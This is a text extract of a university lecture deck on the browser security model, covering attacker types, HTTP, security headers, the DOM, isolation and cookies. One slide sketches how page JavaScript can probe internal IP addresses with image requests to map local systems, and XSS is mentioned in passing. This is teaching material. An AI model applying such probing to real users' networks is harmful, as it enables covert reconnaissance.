csci ua 9480 introduction to computer security
play

CSCI-UA.9480 Introduction to Computer Security Session 4.1 Browser - PowerPoint PPT Presentation

Feb 15, 2023 •220 likes •520 views

CSCI-UA.9480 Introduction to Computer Security Session 4.1 Browser Security Model Prof. Nadim Kobeissi Defining 4.1a Browser Security Goals Also before we start: Practical Assignment 2 is now online . 2 CSCI-UA.9480: Introduction to

  1. CSCI-UA.9480 Introduction to Computer Security Session 4.1 Browser Security Model Prof. Nadim Kobeissi

  2. Defining 4.1a Browser Security Goals Also before we start: Practical Assignment 2 is now online . 2 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  3. Browser security goals. Confidentiality : information on your device ● is not put at risk simply by browsing the web. Integrity: Different websites are managed ● through different sessions in isolation. More far-reaching goals could include imbuing web applications with the same security as desktop applications. 3 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  4. Can web apps be as trustworthy as local apps? Example: ProtonMail. ProtonMail ensures security guarantees ● through TLS and client-side encryption. However, a malicious ProtonMail host ● server can imperceptibly modify code for VS select sessions. This is very different from desktop and mobile applications, which have signing and versioning. 4 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  5. Browser security threat model. Browser Internet Server google.com Alice 5 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  6. Browser security threats: web attacker. Browser Internet Server goo o gle.com Alice 6 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  7. Browser security threats: web attacker. Log into apple- icloud.com to reset your password! Browser Internet Server Alice 7 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  8. Browser security threats: network attacker. Browser Internet Server google.com Alice 8 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  9. Browser security threats: software attacker. XSS? RCE? Browser Internet Server google.com Alice 9 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  10. Browser security threats: software attacker. Open this attachment which contains exploit code your latest bill! Browser Internet Server google.com Alice 10 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  11. Comparing different attackers. Web attacker. Software attacker. Controls their own website, for which they Actually finds bugs, tries to run code via ● ● can get SSL certificates, etc. XSS, maybe pop a shell… User is misled into visiting the attacker’s ● website. Fundamentally an authentication issue. Network attacker. Passive eavesdropping or active traffic ● modification. Offset by TLS. 11 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  12. Comparing different attackers. Software attacker. Actually finds bugs, tries to ● run code via XSS, maybe pop a shell… Cross-site scripting (XSS) : ● inject code into a page that is later executed by a separate client the attacker does not control. (Can you come up with XSS scenarios?) 12 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  13. Browser security goals. Confidentiality : information on your device ● is not put at risk simply by browsing the web. Integrity: Different websites are managed ● through different sessions in isolation. 13 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  14. Browser 4.1b Security Mechanisms 14 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  15. Browser security mechanisms to cover. HTTP. ● Rendering Content. ● Isolation. ● Communication. ● Security User Interface. ● Cookies. ● Many more mechanisms exist. It’s impossible to cover them all. 15 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  16. URIs. https://facebook.com/login.php?target=newsFeed#latest 16 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  17. URIs. Hostname Path Query Protocol Fragment (can include port) https://facebook.com/login.php?target=newsFeed#latest Not sent to server Encrypted if using HTTPS (except if explicitly using JS) 17 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  18. HTTP. GET /index.html HTTP/1.1 POST /login HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) MSIE5.01; Windows NT) Host: www.nyu.edu Host: www.nyu.edu Accept-Language: en-us Content-Type: application/x-www-form- Accept-Encoding: gzip, deflate urlencoded Connection: Keep-Alive Content-Length: length Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: Keep-Alive username=bob&password=logmein23 18 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  19. HTTP. HTTP/1.1 200 OK Date: Mon, 27 Jul 2018 12:28:53 GMT Server: Apache/2.2.14 (Win32) Last-Modified: Wed, 22 Jul 2018 19:15:56 GMT Content-Length: 88 Content-Type: text/html Connection: Closed <html> <body> <h1>Hello, World!</h1> </body> </html> 19 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  20. Examples of HTTP headers related to security. Hypertext Strict Transport Security (HSTS) : ● Instructs the browser to only accept HTTPS connections from this domain for the next Strict-Transport-Security: max- specified period of time. age=<expirationtime>; includeSubDomains Content Security Policy (CSP): Disable ● Content-Security-Policy: <directive> dangerous JavaScript and CSS features, prevent loading content from unspecified X-Frame-Options: DENY resource addresses. X-Frame-Options: Prevent this page from ● being loaded in an iframe on other websites. 20 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  21. HTTPS and mixed content. Even if an entire website is loaded using ● HTTPS, a single resource being served over <html> <head> HTTP can give the attacker leverage. <title>NYU</title> Especially if it’s executed. <script type=“application/javascript” ● src=https://resources.nyu.edu/login.js></scri pt> <script type=“application/javascript” src=http://jquerycdn.com/jquery.js></script> </head> <body> </body> </html> 21 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  22. Rendering content. document Browsers will load content (HTML, XML, ● Root element: CSS) and subsequently render it into the <html> Element: Document Object Model (DOM). <head> Elements within the DOM can contain ● Element: DOM Document Object Model <title> content, can have properties and can even Text: Element: "My title" trigger events handled by JavaScript code. <body> Element: JavaScript is, of course, not rendered but ● <h1> executed. Text: "A heading" Element: Attribut: <a> href Text: "Link text" 22 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  23. Rendering content. document Elements in the DOM have methods (like in ● Root element: OO programming): document.write() , <html> Element: etc. <head> In many ways, the DOM is adjacent to the ● Element: DOM Document Object Model <title> Browser Object Model (BOM): window, Text: Element: "My title" document, history, navigation … <body> Element: <h1> Text: "A heading" Element: Attribut: <a> href Text: "Link text" 23 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  24. Using JavaScript to learn local information. document Example: Request images from internal IP ● Root element: addresses <html> Element: <img src=“192.168.0.4:8080”/> ● <head> Use timeout/ onError to determine ● Element: DOM Document Object Model <title> success/failure. Text: Element: "My title" Create a map/fingerprint of local systems. ● <body> Element: <h1> Text: "A heading" Element: Attribut: <a> href Text: "Link text" 24 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  25. Isolation and Communication. Iframes: Split a page into separate isolated ● segments, each with their own namespace. Windows and their frames may interact ● through a restricted API: window.postMessage 25 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  26. Security User Interface. Users need to check for many markers: ● Is the site using TLS? ● Is the URL accurate? ● Extended validation sometimes helps. ● Users can still be misled by a padlock.jpg. ● 26 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  27. Cookies. Cookies act as session identifiers or key-value stores between the web client and web server. Once the client logs in, the server may issue ● POST them a secret session cookie that they both Set-Cookie: then keep track of. NAME=VALUE domain= Secure cookies are sent only over HTTPS. ● expires= secure= httpOnly cookies can be sent over HTTP or ● HTTPS (misleading name) but cannot be accessed by JavaScript via document.cookies . 27 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

  28. 4.2 Next time: Web Application Security Review this learning tool for next time! https://unescape-room.jobertabma.nl 28 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

CSCI-UA.9480 Introduction to Computer Security Session 1.3 Public Key Cryptography and

CSCI-UA.9480 Introduction to Computer Security Session 1.3 Public Key Cryptography and

CSCI-UA.9480 Introduction to Computer Security Session 1.3 Public Key Cryptography and Randomness Prof. Nadim Kobeissi 1.3a Hard Problems 2 CSCI-UA.9480: Introduction to Computer Security Nadim Kobeissi Evaluating computational

719 views • 49 slides
CSCI-UA.9480 Introduction to Computer Security Session 1.1 One-Way Functions and Hash Functions

CSCI-UA.9480 Introduction to Computer Security Session 1.1 One-Way Functions and Hash Functions

CSCI-UA.9480 Introduction to Computer Security Session 1.1 One-Way Functions and Hash Functions Prof. Nadim Kobeissi 1.1a Why Hash Functions? Describing the importance of the cryptographers Swiss Army knife. 2 CSCI-UA.9480:

569 views • 34 slides
CSCI-UA.9480 Introduction to Computer Security Session 1.8 E-Voting and Other Modern Uses of

CSCI-UA.9480 Introduction to Computer Security Session 1.8 E-Voting and Other Modern Uses of

CSCI-UA.9480 Introduction to Computer Security Session 1.8 E-Voting and Other Modern Uses of Cryptography Prof. Nadim Kobeissi 1.8a Electronic Voting 2 CSCI-UA.9480: Introduction to Computer Security Nadim Kobeissi Properties of an

879 views • 20 slides
CSCI-UA.9480 Introduction to Computer Security Session 3.3 Systems Security and Isolation Prof.

CSCI-UA.9480 Introduction to Computer Security Session 3.3 Systems Security and Isolation Prof.

CSCI-UA.9480 Introduction to Computer Security Session 3.3 Systems Security and Isolation Prof. Nadim Kobeissi Operating 3.3a System Security Basics 2 CSCI-UA.9480: Introduction to Computer Security Nadim Kobeissi Operating systems:

417 views • 24 slides
CSCI-UA.9480 Introduction to Computer Security Session 1.4 Transport Layer Security Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 1.4 Transport Layer Security Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 1.4 Transport Layer Security Prof. Nadim Kobeissi 1.4a HTTPS and TLS 2 CSCI-UA.9480: Introduction to Computer Security Nadim Kobeissi What is TLS? The S in HTTP S . Most likely

852 views • 35 slides
CSCI-UA.9480 Introduction to Computer Security Session 3.5 Meltdown and Spectre Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 3.5 Meltdown and Spectre Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 3.5 Meltdown and Spectre Prof. Nadim Kobeissi But Nadim, why are we covering this? 2 CSCI-UA.9480: Introduction to Computer Security Nadim Kobeissi Fixed confidentially across whole

365 views • 24 slides
Introduction to Computer Security Session 1.2 Symmetric Key Encryption Prof. Nadim Kobeissi

Introduction to Computer Security Session 1.2 Symmetric Key Encryption Prof. Nadim Kobeissi

CSCI-UA.9480 Introduction to Computer Security Session 1.2 Symmetric Key Encryption Prof. Nadim Kobeissi 1.2a Cryptographic Security Information Theoretical Foundation for Security. 2 CSCI-UA.9480: Introduction to Computer Security

709 views • 53 slides
Introduction to Computer Security Session 0 Introduction and Threat Modeling Prof. Nadim

Introduction to Computer Security Session 0 Introduction and Threat Modeling Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 0 Introduction and Threat Modeling Prof. Nadim Kobeissi 0a Introduction Welcome! 2 CSCI-UA.9480: Introduction to Computer Security Nadim Kobeissi Welcome to your new course! Open

642 views • 35 slides
Introduction to Computer Security Session 1.5 Usable Security and Secure Messaging Prof. Nadim

Introduction to Computer Security Session 1.5 Usable Security and Secure Messaging Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 1.5 Usable Security and Secure Messaging Prof. Nadim Kobeissi 1.5a Usable Security: Then and Now 2 CSCI-UA.9480: Introduction to Computer Security Nadim Kobeissi Humans are

1.24k views • 67 slides
Introduction to Computer Security Session 4.4 Web Privacy Prof. Nadim Kobeissi 4.4a Web

Introduction to Computer Security Session 4.4 Web Privacy Prof. Nadim Kobeissi 4.4a Web

CSCI-UA.9480 Introduction to Computer Security Session 4.4 Web Privacy Prof. Nadim Kobeissi 4.4a Web Privacy Goals 2 CSCI-UA.9480: Introduction to Computer Security Nadim Kobeissi Web privacy goals. Preventing websites from learning:

337 views • 14 slides
Introduction to Computer Security Session 2.2 Denial of Service Prof. Nadim Kobeissi 2.2a

Introduction to Computer Security Session 2.2 Denial of Service Prof. Nadim Kobeissi 2.2a

CSCI-UA.9480 Introduction to Computer Security Session 2.2 Denial of Service Prof. Nadim Kobeissi 2.2a Defining Denial of Service 2 CSCI-UA.9480: Introduction to Computer Security Nadim Kobeissi What is a Denial of Service attack? An

920 views • 23 slides
Introduction to Computer Security Session 2.1 Networking Basics, TCP, IP and DNS Prof. Nadim

Introduction to Computer Security Session 2.1 Networking Basics, TCP, IP and DNS Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 2.1 Networking Basics, TCP, IP and DNS Prof. Nadim Kobeissi Welcome to Part 2 of the course! Part 2 discusses how computer networks work and security threats their face. Networking

713 views • 33 slides
Outline The web from a security perspective CSci 5271 Introduction to Computer Security SQL

Outline The web from a security perspective CSci 5271 Introduction to Computer Security SQL

Outline The web from a security perspective CSci 5271 Introduction to Computer Security SQL injection Web security, part 1 Announcements intermission Stephen McCamant University of Minnesota, Computer Science &amp; Engineering Web

522 views • 5 slides
Introduction to Computer Security Session 2.3 Designing Secure Network Systems Prof. Nadim

Introduction to Computer Security Session 2.3 Designing Secure Network Systems Prof. Nadim

CSCI-UA.9480 Introduction to Computer Security Session 2.3 Designing Secure Network Systems Prof. Nadim Kobeissi Goals of todays class. A look into some secure network systems: WireGuard: a modern VPN. A critical look at ProtonMail,

1.15k views • 71 slides
Outline Usability and security CSci 5271 Introduction to Computer Security Announcements

Outline Usability and security CSci 5271 Introduction to Computer Security Announcements

Outline Usability and security CSci 5271 Introduction to Computer Security Announcements intermission Day 25: Usability and security Stephen McCamant Usable security example areas University of Minnesota, Computer Science &amp; Engineering

419 views • 4 slides
Outline Usability and security CSci 5271 Introduction to Computer Security Announcements

Outline Usability and security CSci 5271 Introduction to Computer Security Announcements

Outline Usability and security CSci 5271 Introduction to Computer Security Announcements intermission Day 24: Usability and security Stephen McCamant Usable security example areas University of Minnesota, Computer Science &amp; Engineering

219 views • 5 slides
XML in Programming Patryk Czarnik XML and Applications 2015/2016 Lecture 5 4.04.2016 XML in

XML in Programming Patryk Czarnik XML and Applications 2015/2016 Lecture 5 4.04.2016 XML in

XML in Programming Patryk Czarnik XML and Applications 2015/2016 Lecture 5 4.04.2016 XML in programming what for? T o access data in XML format T o use XML as data carrier (storage and transmission) T o support XML applications

739 views • 48 slides
Javascript in the browser Thierry Sans Example &lt;html&gt; &lt;body&gt; &lt;script

Javascript in the browser Thierry Sans Example &lt;html&gt; &lt;body&gt; &lt;script

Javascript in the browser Thierry Sans Example &lt;html&gt; &lt;body&gt; &lt;script type=&quot;text/javascript&quot;&gt; document.body.innerHTML = &quot;&lt;h1&gt;This is a heading&lt;/h1&gt;&quot;; &lt;/script&gt; &lt;/body&gt;

402 views • 15 slides
Welcome to CS50 section! This is Week 10 :( This is our last section! Final project

Welcome to CS50 section! This is Week 10 :( This is our last section! Final project

Welcome to CS50 section! This is Week 10 :( This is our last section! Final project dates Official proposals: due this Friday at noon Status report: due Monday, Nov 28 at noon Hackathon: Thursday, Dec 1 at 7pm

401 views • 27 slides
1

1

!

336 views • 7 slides
1 We were motivated to develiop the library described in this presentation because we were

1 We were motivated to develiop the library described in this presentation because we were

This paper was presented at DVCon in San Jose, CA on 4th March 2014. 1 We were motivated to develiop the library described in this presentation because we were frustrated by the lack of features in SystemVerilog that we would take for grarnted

537 views • 22 slides
XML Technologies and Applications Jukka Teuhola University of Turku Dept. of Information

XML Technologies and Applications Jukka Teuhola University of Turku Dept. of Information

XML Technologies and Applications Jukka Teuhola University of Turku Dept. of Information Technology Computer Science Spring 2013 XML-1 J. Teuhola 2013 1 1. General Extent: 5 study points Level: Advanced (syventv) Form:

650 views • 20 slides
Objectives Review: JSPs, Organization, Version Control JavaScript Some slides are in PDF

Objectives Review: JSPs, Organization, Version Control JavaScript Some slides are in PDF

Objectives Review: JSPs, Organization, Version Control JavaScript Some slides are in PDF that were not covered in class Log into the lab machine Were going to create some HTML files that contain JavaScript in a js_practice

859 views • 37 slides
219451: Web Services: Concepts, Design and Implementation Lecture 2 XML Basis XML, HTML and

219451: Web Services: Concepts, Design and Implementation Lecture 2 XML Basis XML, HTML and

219451: Web Services: Concepts, Design and Implementation Lecture 2 XML Basis XML, HTML and SGML : A big picture XML Overview DTD Parser DOM Original slides by Dr.Benchaporn Limthammaporn (blt@cs.kmitnb.ac.th) 1 Edited by Dr.Monchai

476 views • 28 slides

More recommend